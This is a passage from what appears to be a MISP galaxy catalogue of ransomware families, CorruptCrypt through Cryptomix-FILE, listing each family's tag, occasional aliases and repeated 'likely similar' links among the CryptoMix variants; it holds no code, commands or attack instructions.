The tag is: misp-galaxy:ransomware="CorruptCrypt"

Creeper

Ransomware

The tag is: misp-galaxy:ransomware="Creeper"

Creepy

Ransomware

The tag is: misp-galaxy:ransomware="Creepy"

Cripton

Ransomware

The tag is: misp-galaxy:ransomware="Cripton"

Cripton7zp

Ransomware

The tag is: misp-galaxy:ransomware="Cripton7zp"

Cry36

Ransomware

The tag is: misp-galaxy:ransomware="Cry36"

Cry9

Ransomware

The tag is: misp-galaxy:ransomware="Cry9"

CryCipher

Ransomware

The tag is: misp-galaxy:ransomware="CryCipher"

CryCipher is also known as:

PayPalGenerator2019

CryForMe

Ransomware

The tag is: misp-galaxy:ransomware="CryForMe"

Crying

Ransomware

The tag is: misp-galaxy:ransomware="Crying"

CryMore

Ransomware

The tag is: misp-galaxy:ransomware="CryMore"

Cryp70n1c

Ransomware

The tag is: misp-galaxy:ransomware="Cryp70n1c"

Crypt0 HT

Ransomware

The tag is: misp-galaxy:ransomware="Crypt0 HT"

Crypt0

Ransomware

The tag is: misp-galaxy:ransomware="Crypt0"

Crypt0L0cker

Ransomware

The tag is: misp-galaxy:ransomware="Crypt0L0cker"

Crypt0r

Ransomware

The tag is: misp-galaxy:ransomware="Crypt0r"

Crypt12

Ransomware

The tag is: misp-galaxy:ransomware="Crypt12"

CryptFuck

Ransomware

The tag is: misp-galaxy:ransomware="CryptFuck"

CryptGh0st

Ransomware

The tag is: misp-galaxy:ransomware="CryptGh0st"

Crypto_Lab

Ransomware

The tag is: misp-galaxy:ransomware="Crypto_Lab"

CryptoApp

Ransomware

The tag is: misp-galaxy:ransomware="CryptoApp"

Crypto-Blocker

Ransomware

The tag is: misp-galaxy:ransomware="Crypto-Blocker"

CryptoBoss

Ransomware

The tag is: misp-galaxy:ransomware="CryptoBoss"

CryptoCat

Ransomware

The tag is: misp-galaxy:ransomware="CryptoCat"

CryptoClone

Ransomware

The tag is: misp-galaxy:ransomware="CryptoClone"

CryptoDark

Ransomware

The tag is: misp-galaxy:ransomware="CryptoDark"

CryptoGod 2017

Ransomware

The tag is: misp-galaxy:ransomware="CryptoGod 2017"

CryptoGod 2018

Ransomware

The tag is: misp-galaxy:ransomware="CryptoGod 2018"

CryptoLite

Ransomware

The tag is: misp-galaxy:ransomware="CryptoLite"

CryptolockerEmulator

Ransomware

The tag is: misp-galaxy:ransomware="CryptolockerEmulator"

CryptoLockerEU 2016

Ransomware

The tag is: misp-galaxy:ransomware="CryptoLockerEU 2016"

CryptoManiac

Ransomware

The tag is: misp-galaxy:ransomware="CryptoManiac"

CryptoMix-0000

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-0000"

View relationships graph

CryptoMix-0000 has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Arena

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Arena"

View relationships graph

CryptoMix-Arena has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Azer

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Azer"

View relationships graph

CryptoMix-Azer has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Backup

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Backup"

View relationships graph

CryptoMix-Backup has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-CK

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-CK"

View relationships graph

CryptoMix-CK has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Coban

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Coban"

View relationships graph

CryptoMix-Coban has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-DLL

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-DLL"

View relationships graph

CryptoMix-DLL has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Empty

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Empty"

View relationships graph

CryptoMix-Empty has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Error

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Error"

View relationships graph

CryptoMix-Error has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Exte

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Exte"

View relationships graph

CryptoMix-Exte has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

Cryptomix-FILE

Ransomware

The tag is: misp-galaxy:ransomware="Cryptomix-FILE"

View relationships graph

Cryptomix-FILE has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
